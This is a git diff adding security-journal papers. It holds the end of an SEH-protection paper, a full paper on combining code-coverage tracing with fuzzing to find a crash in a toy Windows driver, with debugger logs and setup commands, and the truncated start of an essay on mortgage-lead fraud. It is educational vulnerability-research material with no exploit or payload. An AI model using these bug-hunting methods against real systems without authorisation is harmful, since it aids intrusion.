list and also use it as a location to store code. This important +consequence is the key to being able to detect and prevent the leveraging of an +SEH overwrite to gain code execution. + +Looking toward the future, the usefulness of this solution will begin to wane +as 64-bit versions of Windows begin to dominate the desktop environment. The +reason 64-bit versions are not affected by this solution is because exception +handling on 64-bit versions of Windows is inherently secure due to the way it's +been implemented. However, this only applies to 64-bit binaries. Legacy +32-bit binaries that are capable of running on 64-bit versions of Windows will +continue to use the old style of exception handling, thus potentially leaving +them vulnerable to the same style of attacks depending on what compiler flags +were used. On the other hand, this solution will also become less necessary due +to the fact that modern 32-bit x86 machines support hardware NX and can +therefore help to mitigate the execution of code from the stack. Regardless of +these facts, there will always be a legacy need to protect against SEH +overwrites, and the solution described in this paper is one method of providing +that protection. + +A. References + +Borland. United States Patent: 5628016. +http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=2Fnetahtml2FPTO2Fsrchnum.htm&r=1&f=G&l=50&s1=5,628,016.PN.&OS=PN/5,628,016&RS=PN/5,628,016; +accessed Sep 5, 2006. + + +Litchfield, David. Defeating the Stack based Buffer +Overflow Prevention Mechanism of Microsoft Windows 2003 Server. + +http://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-litchfield.pdf; +accessed Sep 5, 2006. + + +Microsoft Corporation. Structured Exception Handling. + +http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/structured_exception_handling.asp; +accessed Sep 5, 2006. + + +Microsoft Corporation. Working with the AppInitDLLs +registry value. + +http://support.microsoft.com/default.aspx?scid=kb;en-us;197571; +accessed Sep 5, 2006. + + +Microsoft Corporation. /GS (Buffer Security Check) + +http://msdn2.microsoft.com/en-us/library/8dbf701c.aspx; +accessed Sep 5, 2006. + + +Nagy, Ben. SEH (Structured Exception Handling) Security +Changes in XPSP2 and 2003 SP1. + +http://www.eeye.com/html/resources/newsletters/vice/VI20060830.html#vexposed; +accessed Sep 8, 2006. + + +Pietrek, Matt. A Crash Course on the Depths of Win32 +Structured Exception Handling. + +http://www.microsoft.com/msj/0197/exception/exception.aspx; +accessed Sep 8, 2006. + + +skape. Improving Automated Analysis of Windows x64 +Binaries. +http://www.uninformed.org/?v=4&a=1&t=sumry; accessed +Sep 5, 2006. + + +Wehnus. WehnTrust. +http://www.wehnus.com/products.pl; accessed Sep 5, +2006. + + +Wikipedia. Matryoshka Doll. +http://en.wikipedia.org/wiki/Matryoshka_doll; +accessed Sep 18, 2006. + + +Wine. CompilerExceptionSupport. +http://wiki.winehq.org/CompilerExceptionSupport; +accessed Sep 5, 2006. + + + diff --git a/uninformed/5.3.txt b/uninformed/5.3.txt new file mode 100644 index 0000000..b71b744 --- /dev/null +++ b/uninformed/5.3.txt @@ -0,0 +1,659 @@ +Effective Bug Discovery +9/2006 +vf +vf@nologin.org + + +"If we knew what it was we were doing, it would not be +called research, would it?" + + - Albert Einstein + + +1) Foreword + +Abstract: Sophisticated methods are currently being developed and +implemented for mitigating the risk of exploitable bugs. The process of +researching and discovering vulnerabilities in modern code will require +changes to accommodate the shift in vulnerability mitigations. Code +coverage analysis implemented in conjunction with fuzz testing reveals +faults within a binary file that would have otherwise remained +undiscovered by either method alone. This paper suggests a research +method for more effective runtime binary analysis using the +aforementioned strategy. This study presents empirical evidence that +despite the fact that bug detection will become increasingly difficult +in the future, analysis techniques have an opportunity to evolve +intelligently. + +Disclaimer: Practices and material presented within this paper are meant +for educational purposes only. The author does not suggest using this +information for methods which may be deemed unacceptable. The content in +this paper is considered to be incomplete and unfinished, and therefore +some information in this paper may be incorrect or inaccurate. +Permission to make digital or hard copies of all or part of this work +for personal or classroom use is granted without fee provided that +copies are not made or distributed for profit or commercial advantage +and that copies bear this notice and the full citation on the first +page. To copy otherwise, to republish, requires prior specific +permission. + +Prerequisites: For an in-depth understanding of the concepts presented +in this paper, a familiarity with Microsoft Windows device drivers, +working with x86 assembler, debugging fundamentals, and the Windows +kernel debugger is required. A brief introduction to the current state +of code coverage analysis, including related uses, is introduced to +support information presented within this paper. However, to implement +the practices within this paper a deeper knowledge of aforementioned +vulnerability discovery methods and methodologies are required. The +following software and knowledge of its use is required to follow along +with the discussion: IDAPro, Debugging tools for Windows, Debug Stalk, +and a virtual machine such as VMware or Virtual PC. + +Thanks: The author would like to thank west, icer, skape, Uninformed, +and mom. + + +2) Introduction + + +2.1) The status of vulnerability research + +Researchers employ a myriad of investigative techniques in the quest for +vulnerabilities. In any case, there exists no silver bullet for the +discovery of security related software bugs, not to mention the fact +that several new security oriented kernel-mode components have recently +been integrated into Microsoft operating systems that can make +vulnerability investigations more difficult. Vista, particularly on the +64-bit edition, is integrating several mechanisms including driver +signing, Secure Bootup using a TPM hardware chip, PatchGuard, +kernel-mode integrity checks, and restricted user-mode access to . The +Vista kernel also has an improved Low Fragmentation Heap and Address +Space Layout Randomization. In later days, bugs were revealed via dumb +fuzzing techniques, whereas this year more complicated bugs are +indicating that knowledge of the format would require advanced +understanding of a parser. Because of this, researchers are moving +towards different discovery methods such as intelligent, rather than +dumb, testing of drivers and applications. + + +2.2) The problem with fuzzing + +To compound the conception that these environments are becoming more +difficult to test, monolithic black box fuzz testing, while frequently +efficacious in its purpose, has a tendency for a exhibiting a lack of +potency. The term ``monolithic'' is included as a reference to a +comprehensive execution of the entire application or driver. Fuzzing is +often executed in an environment where the tester does not know the +internals of the binary in question. This leads to disadvantages in +which a large number of tests must be executed to get an accurate +estimate of binary's reliability. This investigation can be a daunting +task if not implemented in a constructive manner. The test program and +data selection should ensure independence from unrelated tests or groups +of tests, thereby gaining the ability of complete coverage by reducing +dependency on specific variables and their decision branching. + +Another disadvantage of monolithic black box fuzz testing is that it is +difficult to provide coverage analysis even though the testing selection +may cover the entire suite of security testing models. A further +complication in this nature of testing is of cyclic dependency causing +cyclic arguments which in turn leads to a lessening of coverage +assurance. + + +2.3) Expectations + +This paper aims to educate the reader on the espousal of code coverage +analysis and fuzzing philosophy presented by researchers as a means to +lighten the burden of bug detection. A kernel mode device driver will be +fuzzed for bugs using a standard fuzzing method. Results from the +initial fuzzing test will be examined to determine coverage. The fuzz +testing method will be revised to accommodate coverage concerns and an +execution graph is generated to view the results of the previous +testing. A comparison is then made between the two prior testing +methods, proving how effective code coverage analysis through kernel +mode Stalking can improve fuzzing endeavors. + + +3) QA + +Before understanding how the methodologies presented in this paper can +be used, a few simple definitions and descriptions are addressed for the +benefit of the reader. + + +3.1) What is code coverage? + +Code coverage, as represented by a Control Flow Graph (CFG), is defined +as a measure of the exercised code within a program undergoing software +testing. For the purpose of vulnerability research, the goal is to +utilize code coverage analysis to obtain an exhaustive execution of all +possible paths through code and data flow that may be relevant for +revealing failures. It is used as a good metric in determining how a +specific set of tests can uncover numerous faults. Techniques of proper +code coverage analysis presented in this paper utilize basic +mathematical properties of graph theory by including elements such as +vertices, links and edges. Graph theory has lain somewhat dormant until +recently being utilized by computer scientists which have subsequently +defined their own sets of vocabulary for the subject. For the sake of +research continuity and to link mathematical to computer science +definitions, the verbiage used within this paper will equate vertices to +code blocks, branches to decisions, and edges to code paths. + +To support our hypothesis, the aforementioned graph theory elements are +compiled into CFGs. Informally, a Control Flow Graph is a directed graph +composed of a finite set of vertices connected by edges indicating all +possible routes a driver or application may take during execution. In +other words, a CFG is merely blocks of code whose connected flow paths +are determined by decisions. Block execution consists of a sequence of +instructions which are free of branching or other control transfers +except for the last instruction. These include branches or decisions +which consist of Boolean expressions in a control structure. A path is a +sequence of nodes traveled through by a series of uninterrupted links. +Paths enable flow of information or data through code. In our case, a +path is an execution flow and is therefore essential to measuring code +coverage. Because of this factor, this investigation focuses directly on +determining which paths have been traversed, which blocks and +correlating data have been executed, and which links have been followed +and finally applying it to fuzzing techniques. + +The purpose of code coverage analysis is ultimately to require all +control decisions to be exercised. In other words, the application +needs to be executed thoroughly using enough inputs that all edges in +the graph are traversed at least once. These graphs will be represented +as diagrams in which blocks are squares, edges are lines, and paths are +colored. + + +4) Hypothesis: Code Coverage and Fuzzing + +In the security arena, fuzzing has traditionally manifested potential +security holes by throwing random garbage at a target, hoping that any +given code path will fail in the process of consuming the aforementioned +data. The possibility of execution flowing through a particular block in +code is the sum of probabilities of the conditional branches leading to +blocks. In simplicity, if there are areas of code that are never +executed during typical fuzz testing, then administering code coverage +methodologies will reveal those unexecuted branches. Graphical code +coverage analysis using CFGs helps determine which code path has been +executed even without the use of symbol tables. This process allows the +tester to more easily identify branch execution, and to subsequently +design fuzz testing methods to properly attain complete code coverage. +Prior experiments driven at determining the effectiveness of code +coverage techniques identify that ensuring branch execution coverage +will improve the likelihood of discovery of binary faults. + + +4.1) Process and Kernel Stalking + +One of the more difficult questions to answer when testing software for +vulnerabilities is: ``when is the testing considered finished?'' How do +we, as vulnerability bug hunters, know when we have completed our +testing cycle by exhausting all code paths and discovering all possible +bugs? Because fuzz testing can easily be random, so unpredictable, the +question of when to conclude testing is often left incomplete. + +Pedram Amini, who recently released ``Paimei'', coined the term "Process +Stalking" as a set of runtime binary analysis tools intended to enhance +the visual effect of runtime analysis. His tool includes an IDA Pro +plug-in paired with GML graph files for easy viewing. His strategy +amalgamates the processes of runtime profiling through tracing and state +mapping, which is a graphic model composed of behavior states of a +binary. Pedram Amini's "Process Stalker" tool suite can be found on his +personal website (http://pedram.redhive.com) and the reverse engineering +website OpenRCE (http://www.openrce.org). -- might just use references +or something. The fact that process stalker is used to reverse MS Update +patches is irrelevant to the paper. + + +4.2) Stalking and Fuzzing Go Hand in Hand + +Process Stalker was transformed by an individual into a windbg extension +for use in debugging user-mode and kernel-mode scenarios. This tool was +given the title ``Debug Stalk,'' and until now this tool has remained +unreleased. Process and Debug Stalker have overcome the static analysis +visualization setback by implementing runtime binary analysis. Runtime +analysis using Process and Debug Stalking in conjunction with +mathematically enhanced CFGs exponentially improves the bug hunting +mechanisms using fuzz techniques. Users can graphically determine via +runtime analysis which paths have not been traversed and which blocks +have not been executed. The user then has the opportunity to refine +their testing approach to one that is more effective. When testing a +large application, this technique dramatically reduces the overall +workload of said scenarios. Therefore, iterations of the Process Stalk +tool and the Debug Stalk tool will be used for investigating a faulty +driver in this paper. + +Debug Stalk is a Windows debugger plug-in that can be used in places +where Process Stalking may not be suited, such as in a kernel-mode +setting. + + +5) Implementation + +For the mere sake of simple illustration, several tools have been +created for testing our code coverage theories. Some of the test cases +have been exaggerated and are not real world examples. This testing +implementation is broken down into three parts: Part I includes sending +garbage to the device driver with dumb fuzzing; Part II will include +smarter fuzzing; Part III is a breakdown of how an intelligent level of +fuzzing helps improve code coverage while testing. First, a very simple +device driver named pluto.sys was created for the purpose of this paper. +It contains several blocks of code with decision based branching that +will be fuzzed. The fuzzer will send iterations of random data to +pluto.sys. After fuzzing has completed, a post-analysis tool will review +executed code blocks within the driver. Part II will contain the same +process as Part I, however, it will include an updated fuzzer based on +our Part I post-analysis that will allow the driver to call into a +previously unexecuted code region. Part III uses the data collected in +Parts I and II as illustrative example of a proof of a beneficiary code +coverage thesis. + + +5.1) Stalking Setup + +Several software components need to be acquired before Stalking can +begin: the Debug Stalk extension, Pedram's Process Stalker, Python, and +the GoVisual Diagram Editor (GDE). Pedram's Stalker is listed on both +his blog and on the OpenRCE website. The Process Stalker contains files +such as the IDA Pro plug-in, and Python scripts that generate the GML +graph files that will be imported into GDE. GDE provides a functional +mechanism for editing and positioning of graphs including clustered +graphing, creation and deletion of nodes, zooming and scrolling, +automatic graph layout. Components can be obtained at the following +locations: + +GDE: http://www.oreas.com/gde_en.php +Python: http://www.python.org/download +Proc Stalker: http://www.openrce.org/downloads/details/171/Process Stalker +Debug Stalk: http://www.nologin.org/code + + +5.2) Installing the Stalker + +A walkthrough of installation for Process Stalker and required +components will be covered briefly in this document, however, more +detailed steps and descriptions are provided in Pedram's supporting +manual. The .bpl file generated by the IDA plug-in will spit out a +breakpoint list for entries within each block. The IDA plug-in +processstalker.plw must be inserted into the IDA Pro plug-ins directory. +Restarting IDA will allow the application to load the plug-in. A +successful installation of the IDA plug-in in the log window will be +similar to the following: + + +[*] pStalker> Process Stalker – Profiler +[*] pStalker> Pedram Amini +[*] pStalker > Compiled on Sep 21 2006 + + +Generating a .bpl file can be started by pressing Alt+5 within the IDA +application. A dialog appears. Make sure that ``Enable Instruction +Colors,'' ``Enable Comments,'' and ``Allow Self Loops'' are all +selected. Pressing OK will prompt for a ``Save as'' dialog. The .bpl +file must be named relative to its given name. For example, if calc.exe +is being watched, the file name must be calc.exe.bpl. In our case, +pluto.sys is being watched, so the file name must be pluto.sys.bpl. A +successful generation of a .bpl file will produce the following output +in the log window: + + +talker> Profile analysis 25% complete. +[*] pStalker> Profile analysis 50% complete. +[*] pStalker> Profile analysis 7% complete. +[*] pStalker> Profile analysis 100% complete. + + +Opening the pluto.sys.bpl file will show that records are colon +delimited: + + +pluto.sys:0000002e:0000002e +pluto.sys:0000006a:0000006a +pluto.sys:0000007c:0000007c + + +5.3) Installing Debug Stalk + + +The Debug Stalk extension can be built as follows. Open the Windows +2003 Server Build Environment window. Set the DBGSDK_INC_PATH and +DBGSDK_LIB_PATH environment variables to specify the paths to the +debugger SDK headers and the debugger SDK libraries, respectively. If +the SDK is installed at c:\WINDBGSDK, the following would work: + + +set DBGSDK_INC_PATH=c:\WINDBGSDK\inc +set DBGSDK_LIB_PATH=c:\WINDBGSDK\lib + + +This may vary depending on where the SDK is installed. The directory +name must not contain a space (' ') in its path. The next step is to +change directories to the project directory. If Debug Stalk source +code is placed within the samples directory within the SDK (located +at c:\WINDBGSDK), then the following should work: + + +cd c:\WINDBGSDK\samples\dbgstalk-0.0.18 + + +Typing build -cg at the command line to build the Debug Stalk project. +Copy the dbgstalk.dll module from within this distribution to the root +folder of the Debugging Tools for Windows root directory. This is the +folder containing programs like cdb.exe and windbg.exe. If you have a +default installation of "Debugging tools for Windows" already installed, +the following should work: + + +copy dbgstalk.dll "c:\Program Files\Debugging Tools for Windows\" + + +The debugger plug-in should be installed at this point. It is important +to note that Debug Stalk is a fairly new tool and has some reliability +issues. It is a bit flakey and some hacking may be necessary in order to +get it running properly. + + +5.4) Stalking with Kernel Debug + + +5.4.1) Part I + +For testing purposes, a Microsoft Operating System needs to be set up +inside of a Virtual PC environment. Load the pluto.sys driver inside of +the Virtual PC and attach a debug session via Kernel Debug (kd). Once kd +is loaded and attached to a process within the Virtual Machine, Debug +Stalk can be invoked by calling "!dbgstalk.dbgstalk [switches] [.bpl +file path]" at the kd console. For example: + + +C:\Uninformed>kd -k com:port=\\.\pipe\woo,pipe + +Microsoft (R) Windows Debugger Version 6.6.0007.5 +Copyright (c) Microsoft Corporation. All rights reserved. + +Opened \\.\pipe\woo +Waiting to reconnect... +Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE +Kernel Debugger connection established. +Windows XP Kernel Version 2600 (Service Pack 2) UP Free x86 compatible +Product: WinNt, suite: TerminalServer SingleUserTS +Built by: 2600.xpsp_sp2_rtm.040803-2158 +Kernel base = 0x804d7000 PsLoadedModuleList = 0x8055ab20 +Debug session time: Sat Sep 23 14:40:24.522 2006 (GMT-7) +System Uptime: 0 days 0:06:50.610 +Break instruction exception - code 80000003 (first chance) +nt!DbgBreakPointWithStatus+0x4: +804e3b25 cc int 3 +kd> .reload +Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE +Loading Kernel Symbols +....................................................... +Loading User Symbols + +Loading unloaded module list +........... +kd> !dbgstalk.dbgstalk -o -b c:\Uninformed\pluto.sys.bpl +[*] - Entering Stalker +[*] - Break Point List.....: c:\Uninformed\pluto.sys.bpl +[*] - Breakpoint Restore...: OFF +[*] - Register Enumerate...: ON +[*] - Kernel Stalking:.....: ON + +current context: + +eax=00000001 ebx=ffdff980 ecx=8055192c edx=000003f8 esi=00000000 edi=f4be2de0 +eip=804e3b25 esp=80550830 ebp=80550840 iopl=0 nv up ei pl nz na po nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202 +nt!RtlpBreakWithStatusInstruction: +804e3b25 cc int 3 + +commands: + + [m] module list [0-9] enter recorder modes + [x] stop recording [v] toggle verbosity + [q] quit/close + + +Once Debug Stalk is loaded, a list of commands is available to the user. A +breakdown of the command line options offered by Debug Stalk is as follows: + + +[m] module list +[0-9] enter recorder modes +[x] stop recording +[v] toggle verbosity +[q] quit/close + + +At this point, the fuzz tool needs to be executed to send random arbitrary data +to the device driver. While the fuzzer is running, Debug Stalk will print out +information to kd. Pressing 'g' at the command line prompt will resume +execution of the target machine. This invocation will look something like +this: + + +kd> g +[*] - Recorder Opened......: pluto.sys.0 +[*] - Recorder Opened......: pluto.sys-regs.0 +Modload: Processing breakpoints for module pluto.sys at f7a7f000 +Modload: Done. 46 of 46 breakpoints were set. +0034c883 T:00000001 [bp] f7a83000 a10020a8f7 mov eax,dword ptr [pluto+0x3000 (f7a82000)] +0034ed70 T:00000001 [bp] f7a8300e 3bc1 cmp eax,ecx +0034eded T:00000001 [bp] f7a83012 a12810a8f7 mov eax,dword ptr [pluto+0x2028 (f7a81028)] +0034ee89 T:00000001 [bp] f7a8302b e9aed1ffff jmp pluto+0x11de (f7a801de) +0034ef16 T:00000001 [bp] f7a801de 55 push ebp +0034ef93 T:00000001 [bp] f7a80219 8b45fc mov eax,dword ptr [ebp-4] +0034f03f T:00000001 [bp] f7a80253 6844646b20 push 206B6444h +0034f0cb T:00000001 [bp] f7a802a2 b980000000 mov ecx,80h +0034f148 T:00000001 [bp] f7a802ab 5f pop edi +00359086 T:00000001 [bp] f7a8006a 8b4c2408 mov ecx,dword ptr [esp+8] +0035920c T:00000001 [bp] f7a800f6 833d0420a8f700 cmp dword ptr [pluto+0x3004 (f7a82004)],0 +003592a9 T:00000001 [bp] f7a8010c 8b7760 mov esi,dword ptr [edi+60h] +00359345 T:00000001 [bp] f7a80114 8b4704 mov eax,dword ptr [edi+4] +003593e1 T:00000001 [bp] f7a80122 6a10 push 10h +0035945e T:00000001 [bp] f7a80133 85c0 test eax,eax +003594eb T:00000001 [bp] f7a80147 ff7604 push dword ptr [esi+4] +00359587 T:00000001 [bp] f7a80176 8bcf mov ecx,edi +00359614 T:00000001 [bp] f7a80182 5f pop edi +0035ac5b T:00000001 [bp] f7a8002e 55 push ebp + +current context: + +eax=00000001 ebx=0000c271 ecx=8055192c edx=000003f8 esi=00000001 edi=291f0c30 +eip=804e3b25 esp=80550830 ebp=80550840 iopl=0 nv up ei pl nz na po nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202 +nt!RtlpBreakWithStatusInstruction: +804e3b25 cc int 3 + + +commands: + + [m] module list [0-9] enter recorder modes + [x] stop recording [v] toggle verbosity + [q] quit/close + +kd> q +[*] - Exiting Stalker +q + + +Debug Stalk has finished Stalking the points in the driver allowed by the +fuzzer. Files named "pluto.sys.0," "pluto.sys-regs.0 (optional)," have been +saved to the current working directory. + + +5.5) Analyzing the output + +Pedram has developed a set of Python scripts to support the .bpl and recorder +output file, such as adding register metadata to the graph, filtering generated +breakpoint lists, additional GDE support for difficult graphs, combining +multi-function graphs into a conglomerate graph, highlighting interesting +blocks, importing back into the IDA changes made directly to the graph, adding +function offsets to breakpoint addresses and optionally rebasing the recording +addresses, and much more. Pedram provides detailed descriptions and usage of +his python scripts in his manual. The Python scripts used for formatting the +.gml files (for block based coverage) are psprocessrecording and +psviewrecordingfuncs. The psprocessrecording script is executed first on the +pluto.sys.0 which will produce another file called +pluto.sys.0.BadFuzz-processed. The psviewrecordingfuncs is executed on the +pluto.sys.0.BadFuzz-processed file to produce the file called BadFuzz.gml, +which is the chosen name for the initial testing technique. More information on +Pedram's Python scripts, reference the Process Stalking Manual. Opening the +resulting .gml file will enable us to view the following graph. + +Executed blocks are available in pink, unexecuted blocks are shown as grey, +paths of execution are green lines, and unexecuted paths are red lines. At this +point it is important to note that the code block starting at address 00011169 +does not get executed. This is detrimental to our testing process because it +appears that fuzzer supplied data is passed to it and it does not appear to get +executed. Based on this evidence, we can conclude that a readjustment of our +testing methodologies needs to be put in place so that we can hit that +unexecuted block. + +Analysis indicates that the device driver does not execute block 00011169 +because a comparison is made in the block at address 00011147 which reveals +that [eax] does not match a specified value. Since eax is pointing to the +fuzzer supplied data, we should be able to adjust the fuzzer to meet the +requirement of the 00011161 cmp dword ptr [eax], 0DEADBEEFh instruction, which +will allow us to get into block 00011169. BetterFuzz.exe was improved to do +complete the previous description. + + +5.5.1) Part II + +Determining that the previous testing methodology is not effective, a +re-engineering of the test case has been implemented and re-testing the driver +to hit the missed block can now be accomplished. Following the steps provided +in Part I, the driver is loaded into the Virtual PC, kd is attached to the +driver process, and Debug Stalk has been loaded into kd and has been invoked to +run by using the 'g' command. The entire process is the same except that when +the new fuzz test is invoked, different output is printed to kd: + +kd> g +[*] - Recorder Opened......: pluto.sys.0 +[*] - Recorder Opened......: pluto.sys-regs.0 +Modload: Processing breakpoints for module pluto.sys at f7a27000 +Modload: Done. 46 of 46 breakpoints were set. +004047a0 T:00000001 [bp] f7a2b000 a100a0a2f7 mov eax,dword ptr [pluto+0x3000 (f7a2a000)] +004052bc T:00000001 [bp] f7a2b00e 3bc1 cmp eax,ecx +00405339 T:00000001 [bp] f7a2b012 a12890a2f7 mov eax,dword ptr [pluto+0x2028 (f7a29028)] +004053e5 T:00000001 [bp] f7a2b02b e9aed1ffff jmp pluto+0x11de (f7a281de) +00405462 T:00000001 [bp] f7a281de 55 push ebp +004054ee T:00000001 [bp] f7a28219 8b45fc mov eax,dword ptr [ebp-4] +0040558b T:00000001 [bp] f7a28253 6844646b20 push 206B6444h +00405617 T:00000001 [bp] f7a282a2 b980000000 mov ecx,80h +00405694 T:00000001 [bp] f7a282ab 5f pop edi +00406ccc T:00000001 [bp] f7a2806a 8b4c2408 mov ecx,dword ptr [esp+8] +00406e04 T:00000001 [bp] f7a280f6 833d04a0a2f700 cmp dword ptr [pluto+0x3004 (f7a2a004)],0 +00406eb0 T:00000001 [bp] f7a2810c 8b7760 mov esi,dword ptr [edi+60h] +00406f4c T:00000001 [bp] f7a28114 8b4704 mov eax,dword ptr [edi+4] +00406ff8 T:00000001 [bp] f7a28122 6a10 push 10h +00407075 T:00000001 [bp] f7a28133 85c0 test eax,eax +00407102 T:00000001 [bp] f7a28147 ff7604 push dword ptr [esi+4] +004071ae T:00000001 [bp] f7a28169 6a04 push 4 + +current context: + +eax=00000003 ebx=00000000 ecx=8050589d edx=0000006a esi=00000000 edi=f1499052 +eip=804e3b25 esp=f3cbe720 ebp=f3cbe768 iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 +nt!RtlpBreakWithStatusInstruction: +804e3b25 cc int 3 + +commands: + + [m] module list [0-9] enter recorder modes + [x] stop recording [v] toggle verbosity + [q] quit/close + +kd> k +ChildEBP RetAddr +f3c1971c 805328e7 nt!RtlpBreakWithStatusInstruction +f3c19768 805333be nt!KiBugCheckDebugBreak+0x19 +f3c19b48 805339ae nt!KeBugCheck2+0x574 +f3c19b68 805246fb nt!KeBugCheckEx+0x1b +f3c19bb4 804e1ff1 nt!MmAccessFault+0x6f5 +f3c19bb4 804da1ee nt!KiTrap0E+0xcc +*** ERROR: Module load completed but symbols could not be loaded for pluto.sys +f3c19c48 f79f0173 nt!memmove+0x72 +WARNING: Stack unwind information not available. Following frames may be wrong. +f3c19c84 8057a510 pluto+0x1173 +f3c19d38 804df06b nt!NtWriteFile+0x602 +f3c19d38 7c90eb94 nt!KiFastCallEntry+0xf8 +0006fec0 7c90e9ff ntdll!KiFastSystemCallRet +0006fec4 7c81100e ntdll!ZwWriteFile+0xc +0006ff24 01001276 kernel32!WriteFile+0xf7 +0006ff44 010013a7 betterfuzz_c!main+0xa4 +0006ffc0 7c816d4f betterfuzz_c!mainCRTStartup+0x12f +0006fff0 00000000 kernel32!BaseProcessStart+0x23 + +current context: + +eax=00000003 ebx=00000000 ecx=8050589d edx=0000006a esi=00000000 edi=f1499052 +eip=804e3b25 esp=f3c19720 ebp=f3c19768 iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 +nt!RtlpBreakWithStatusInstruction: +804e3b25 cc int 3 + +commands: + + [m] module list [0-9] enter recorder modes + [x] stop recording [v] toggle verbosity + [q] quit/close + +kd> q +[*] - Exiting Stalker +q + +C:\Uninformed> + +Generating the .gml file allows the tester to view the new execution path. In +this case the block at address 00011169 is executed. All subsequent blocks +underneath it are not executed because the driver BugChecks inside of this +newly hit block indicating a bug of some sort. Command 'k' in kd produces the +stack unwind information and we can see that a BugCheck was initiated for an +Access Violation that occurs inside of pluto.sys. + + +5.6) Part III + +Analysis of the graph BadFuzz.gml generated in Part I indicated that the +testing methods used were not effective enough to exhibit optimal code coverage +of the device driver in question. Part II implemented an improved test case +based on the coverage analysis used in Part I. Graph BetterFuzz.gml allowed +test executers to view the improved testing methods to ensure that the missed +block was reached. This process revealed a fault in block 00011169 which would +have otherwise remained undetected without code coverage analysis. + + +6) Conclusion and Future Work + +This paper illustrated an improved testing technique by taking advantage of +code coverage methods using basic graph theory. The author would like to +reiterate that the driver and fuzz tool used in this paper were simple examples +to illustrate the effectiveness of code coverage practices. + +Finally, more research and experimentation are needed to fully implement these +theorems. The question remains on how to integrate a full code coverage +analysis tool and a fuzzing tool. Much work has been done on code coverage +techniques and their implementations. For example, the paper entitled +Cryptographic Verification of Test Coverage Claims, Devanbu, et al presents +protocols for coverage testing methods such as verifying coverage with and +without source code, with just the binary which can utilize both block and +branch testing (e0178[1].PDF). A tool to automate the espousal of code coverage +and fuzz technologies needs to be implemented so that the two technologies may +work together without manual investigation. Further research may include more +sophisticated coverage techniques using graph theory such as super blocks, +denominators, and applying weights to frequently used loops, paths and edges. +CFGs may also benefit from Bayesian networks which are a directed cyclic graph +of nodes represented as variables including distribution probability for these +variables given the values of its parents. In other words, the Bayesian theory +may be helpful for deterministic prediction of code execution which can in turn +lead to more intelligent fuzzing. In closing, the author extends the hope that +methods and methodologies shared herein can offer other ideas to researchers. + + +A. References + +Devanbu, T (2000). Cryptographic Verification of Test +Coverage Claims. IEEE. 2, 178-192. diff --git a/uninformed/5.4.txt b/uninformed/5.4.txt new file mode 100644 index 0000000..3418170 --- /dev/null +++ b/uninformed/5.4.txt @@ -0,0 +1,418 @@ +Wars Within +9/2006 +Orlando Padilla +xbud@g0thead.com + + +1) Foreword + +Abstract: In this paper I will uncover the information exchange of what +may be classified as one of the highest money making schemes coordinated +by 'organized crime'. I will elaborate on information gathered from a +third party individual directly involved in all aspects of the scheme at +play. I will provide a detailed explanation of this market's origin, +followed by a brief description of some of the actions strategically +performed by these individuals in order to ensure their success. +Finally, I will elaborate on real world examples of how a single person +can be labeled a spammer, malware author, cracker, and an entrepreneur +gone thief. For the purposes of avoiding any legal matters, and +unwanted media, I will refrain from mentioning the names of any +individuals and corporations who are involved in the schemes described +in this paper. + +Disclaimer: This document is written with an educational interest and I +cannot be held liable for any outcome of the information released. + +Thanks: vax, Shannon and Katelynn + + +2) Introduction + +It is inherently obvious to anyone who owns a computer that the Internet +has changed the world around us in a significant number of ways. From +an uncountable number of careers to a world-wide open market, it +drastically affected everything around us. Don't worry though, I will +not bore you with another ``The future will look like this ... '' +article. For that, I will refer to you a great book by Michio Kaku +called Visions that is remarkably accurate considering it was written in +the mid 90's. But anyway, why am I restating the obvious? To allow +myself to focus on one not so obvious division of an existing market +developed by a corporation that had previously filed for bankruptcy. I +will elaborate on how it "innovated" one particular market and how that +change resulted in a ripple of disaster and greed. The market is real +estate and my focus is on mortgage leads + +The idea of finding, selling and stealing leads is anything but new, in +fact Hollywood made a movie based entirely on the importance of sales +leads titled 'Boiler Room' starring Giovanni Ribisi, Ben Affleck and Vin +Diesel . The movie illustrates a perfect example of the significance of +even one major lead. + +I will begin by explaining what mortgage leads are, why they are worth +writing a paper about and how certain individuals have made millions off +of them. I will then discuss the roles of the connected individuals and +how they continue to work when trust is the single point of failure. My +decision to write this article is nothing more than informational, I +have no intentions of ruining the lives of the people who make a living +from what I am about to discuss. In fact, it is to my knowledge not +much of a secret at all but I found it fascinating and wish to share my +experiences with anyone willing to listen. + + +3) Guidance + +As I was growing up, my parents discouraged me from working while +attending school. They made a genuine attempt to provide for me the +support that I needed so that I could focus exclusively on my academics. +Their reasoning for this was simple - Once you start making money, +you'll forget what is important in life and will simply want to follow +this path. As you read through this paper, ask yourself how true this +actually is. + + +Financial gain drives every market around the world, and quite honestly +there are very few things the world as a whole has not yet done for +money. To quantify what my parents' believe, I will describe how the +lives of the people involved vary from the lives they once lived, and +from the lives of a person working a nine-to-five job. + + +4) The Entity + +Mortgage leads, referred to as leads from this point on, are nothing +more than a selective set of criteria consisting of the following: + + +First Name +Last Name +Phone +City +State +Zip +Email +Loan Type +Loan Amount +Affiliate ID +Domain Ref. +Date + + +Each lead must contain at least the above criteria with the exception of +perhaps Affiliate ID and Domain Reference to be worth anything to a +buyer. Furthermore, the more reliable a set of leads is, the more it is +worth to a buyer. A buyer? You ask. Well, financing firms are +indirectly involved in this scheme; finance firms take the information +you sold to them, and follow up with the people allegedly interested in +buying, refinancing or applying for a home loan. + + +4.1) Background + +To fully understand who is selling the collected information and to +elaborate on who is buying the information listed above, I'll introduce +hypothetical Corporation A to play the role of the real company. Corp. +A is a mortgage firm on the fall, not only are they on the verge of +closing shop but they have already filed for Chapter 11 bankruptcy and +are out of viable options for recovery. As a last resort they decide to +offer money in exchange for possible loan application candidate leads. +This quickly gained momentum as the Internet was a prime place for +accumulating such information. The plan eventually imploded, but before +diving into what the outcome was, I'll elaborate on how this truly +became its own market. + + +4.2) Numbers + +Initially each collector averaged about 200 leads per sale which 